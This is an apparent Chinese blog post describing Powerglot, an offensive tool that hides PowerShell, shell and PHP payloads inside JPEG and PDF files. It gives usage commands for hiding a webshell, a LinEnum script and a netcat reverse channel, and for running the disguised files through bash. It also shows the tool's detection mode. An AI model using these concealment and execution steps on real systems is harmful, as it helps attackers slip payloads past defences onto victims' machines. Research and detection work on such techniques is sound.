Powerglot是什么工具

发布时间:2021-12-20 09:48:28 作者:小新
来源:亿速云 阅读:105

这篇文章给大家分享的是有关Powerglot是什么工具的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。

Powerglot

Powerglot是一款功能强大的攻击性PowerShell脚本编码工具,该工具基于Polyglots实现其功能。本质上来说,Powerglot是一款攻击性安全工具,适用于恶意软件、权限提升、横向渗透和反向Shell等方向。

Powerglot可以使用Polyglots来对各种类型的脚本进行编码,比如说攻击性PowerShell脚本,而且还不需要加载器即可运行Payload。

在红队演习或其他攻击性任务中,Payload的伪装/隐藏一般是通过隐写术来完成的,尤其是在躲避网络层保护机制的时候,这也是PowerShell Payload脚本开发中比较常见的技术。近期的一些恶意软件和APT组织也都会选择类似的方式来进行攻击,比如说APT32、APT37、Ursnif、Powload、LightNeuron/Turla、Platinum APT、Waterbug/Turla、Lokibot、dukes(幽灵行动)和Tianium等等。

Powerglot是一款基于Polyglots开发的多功能跨平台攻防工具,Powerglot允许开发人员将脚本代码(PowerShell、Shell脚本和PHP等)隐写在数字图像中,目前该工具的开发人员也正在添加新的文件格式支持。跟其他攻击性工具或恶意软件不同的是,Powerglot不需要任何加载器就可以执行隐藏在目标文件中的信息了,这样可以将恶意程序在目标系统上的噪声降低到最小。

Powerglot在攻击/渗透任务中有着明确的用途,但它也适用于蓝队研究人员。据我们所知,该工具是第一个通用且完全开源的攻击性编码工具,它可以帮助广大研究人员使用Polyglots来搜索隐藏信息,而这些信息可以帮助开发人员在目标系统中实现恶意软件的隐藏或持久性感染。

功能介绍

工具安装

# git clone https://github.com/mindcrypt/powerglot

# python3 powerglot

工具使用&参数

下面给出的是如何使用Powerglot来隐藏Payload的一些演示样例:

样例一-将PowerShell/PHP/Shell脚本隐藏在一个JPEG图像中:

# python3 powerglot.py -o payload.ps1 cat.jpg cat-hidden1.jpg

# python3 powerglot.py -o webshell.php cat.jpg cat-hidden2.jpg

# python3 powerglot.py -o shell.sh cat.jpg cat-hidden3.jpg

样例二-将一个提权Shell脚本隐藏在一个JPEG图像中:

# python3 powerglot.py -o linenum.sh cat.jpg cat-linenum.jpg

# file cat-linenum.jpg (It is a valid JPEG file)

# feh cat-lineum.jpg (The image is properly showed in an image viewer)

 

# We can execute the script in several ways:

 

    a) cat cat-linenum | bash

    b) chmod +x cat-linenum.jpeg; ./cat-linenum.jpeg

样例三-将一个netcat反向信道隐藏在一个JPEG图像中:

# Attacker

# echo "nc 127.0.0.1 4444" > netcat.sh

# python3 powerglot.py -o netcat.sh cat.jpeg cat-netcat.jpeg

# nc -nvlp 4444

 

#Victim

# chmod +x cat-netcat.jpg | ./cat-netcat.jpg

样例四-PDF隐藏:

# Create b64.sh with your favourite payload

base64 Linenum.sh -w 0 > b64.sh

# Edit b64.sh

echo "code in b64.sh" | base64 -d | bash;

 

# python3 powerglot -o b64.sh sample.pdf test.pdf

# file test.pdf

# xpdf test.pdf

 

# Execute payload

# cat test.pdf | bash or chmod +x test.pdf; ./test.pdf

样例五:

# python3 powerglot.py -o script.ps1 cat.jpeg cat-ps.jpeg

# file cat-ps.jpeg

# feh cat-ps.jpeg

 

# Execute payload (example)

# cat cat-ps.jpeg | pwsh

 

PS /home/alfonso/PowerGlot/POWERSHELL> get-process;<#hola <# mundo#>

 

 NPM(K)    PM(M)      WS(M)     CPU(s)      Id  SI ProcessName

 ------    -----      -----     ------      --  -- -----------

      0     0,00       2,70       0,00     830 829 (sd-pam)

      0     0,00       0,00       0,00      75   0 acpi_thermal_pm

      0     0,00       4,80       0,00    1217 854 agent

      0     0,00       1,70       0,00     748 748 agetty

      0     0,00      40,77       1,01    1198 854 applet.py

      0     0,00       6,29       0,00     938 938 at-spi-bus-launcher

      0     0,00       6,61       5,64     953 938 at-spi2-registryd

      0     0,00       0,00       0,00     131   0 ata_sff

      0     0,00       1,77       0,00    8906 …78 atom

      0     0,00     218,81     585,95    8908 …78 atom

      0     0,00     236,18     176,24    8947 …78 atom

      0     0,00     142,14       2,51    9009 …78 atom

      0     0,00      81,54       3,32    8932 …78 atom --type=gpu-process --enable-features=SharedArrayBuffer -…

      0     0,00      39,44       0,01    8910 …78 atom --type=zygote --no-sandbox

      0     0,00       5,62       0,11    1370 …70 bash

      0     0,00       5,36       0,66    5278 …78 bash

      0     0,00       6,34       1,48    6778 …78 bash

      0     0,00       0,00       0,00      68   0 blkcg_punt_bio

      0     0,00      46,73       2,20    1199 854 blueman-applet

      0     0,00      50,25       1,64    1301 854 blueman-tray

在文件系统中检测隐藏代码

#python3 powerglot.py -d ./

--= [Detecting polyglots] --=

..............................................................

[Suspicious file]-[ ./cat-end-extra2.jpg ]..

[Suspicious file]-[ ./cat-end-extra3.jpg ][Polyglot Stegosploit][EOF Signature: */ -->]

.................................................................................

[Suspicious file]-[ ./cat-end-extra1.jpg ]..

感谢各位的阅读!关于“Powerglot是什么工具”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,让大家可以学到更多知识,如果觉得文章不错,可以把它分享出去让更多的人看到吧!

推荐阅读:
  1. FileZilla是什么工具
  2. hive是什么工具

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

上一篇:Create与Run Container怎么区分

下一篇:智能家居巨头Aqara基于 KubeSphere怎样打造物联网微服务平台

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》